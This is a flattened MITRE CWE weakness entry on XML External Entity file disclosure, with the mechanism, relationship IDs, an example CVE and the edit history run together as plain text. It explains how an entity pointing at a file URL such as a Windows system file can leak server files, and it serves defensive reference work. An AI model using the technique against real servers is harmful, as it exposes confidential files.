The product processes an XML document that can contain XML entities with URLs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of "XML entities". It is possible to define an entity locally by providing a substitution string in the form of a URL whose content is substituted for the XML entity when the DTD is processed. The attack can be launched by defining an XML entity whose content is a file URL (which, when processed by the receiving end, is mapped into a file on the server), that is embedded in the XML document, and thus, is fed to the processing application. This application may echo back the data (e.g. in an error message), thereby exposing the file contents. 1000 699 Weakness ChildOf 538 1000 Weakness ChildOf 673 1000 Weakness ChildOf 610 888 Category ChildOf 896 It's important to note that a URL can have non-HTTP schemes, especially, that a URL such as "file:///c:/winnt/win.ini" designates (in Windows) the file C:\Winnt\win.ini. Similarly, a URL can be used to designate any file on any drive. Implementation Confidentiality Read application data CVE-2005-1306 A browser control can allow remote attackers to determine the existence of files via Javascript containing XML script, aka the "XML External Entity vulnerability." Accessibility XML External Entities 43 Anonymous Tool Vendor (under NDA) Eric Dalci Cigital 2008-07-01 updated Time_of_Introduction CWE Content Team MITRE 2008-09-08 updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings CWE Content Team MITRE 2010-02-16 updated Taxonomy_Mappings CWE Content Team MITRE 2010-09-27 updated Background_Details, Other_Notes CWE Content Team MITRE 2011-03-29 updated Name CWE Content Team MITRE 2011-06-01 updated Common_Consequences CWE Content Team MITRE 2012-05-11 updated Relationships Information Leak Through XML External Entity File Disclosure